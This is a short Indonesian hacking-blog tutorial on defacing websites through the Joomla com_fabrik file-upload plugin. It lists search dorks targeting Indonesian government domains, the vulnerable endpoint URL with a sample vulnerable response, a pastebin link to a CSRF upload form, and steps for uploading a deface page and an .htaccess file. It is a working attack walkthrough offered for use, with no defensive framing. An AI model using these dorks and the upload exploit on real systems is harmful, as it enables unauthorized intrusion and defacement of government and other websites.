Halo Disini Aku Mau Membagikan Tutorial Deface Metode Com_Fabrik With CSRF.
Alat Perang Yang DiPerlukan.

Dork
->inurl:com_fabrik site:go.id
->inurl:com_fabrik site:tujuanmu :)

Exploit
->/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
CSRF Com_Fabrik
->https://pastebin.com/raw/fWDDN8g9

Pertama Dorking Terlebih Dahulu Setelah Itu Pilih Salah Satu Website 
Nah Sekarang Masukkan Exploitnya

https://www.target.gov//index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

Vuln : {"filepath":null,"uri":null}
Sekarang Buka CSRFnya Disitu Kalian Ganti Dengan Site Target Kamu :)
 
Sekarang Tinggal Upload Aja Script Deface Kalian Kalau Hoki Munggkin Dapet Upload File
[.htaccess]
Script Deface Save ext : htm or html
 
Sekarang Tinggal Klik Upload Aja Kalau Berhasil Terupload Akan Begini
Tinggal Copy Aja Dan Paste Dan Bom Sukses Upload Your File :)
Dan Langsung Cheak Apakah Sudah Kita Lihat
Hehehe Gue Sukses :)
Kalau Kamu :3

 

- Copyright © Tutorial Hacking - Hatsune Miku - Powered by Blogger - Designed by Johanes Djogan -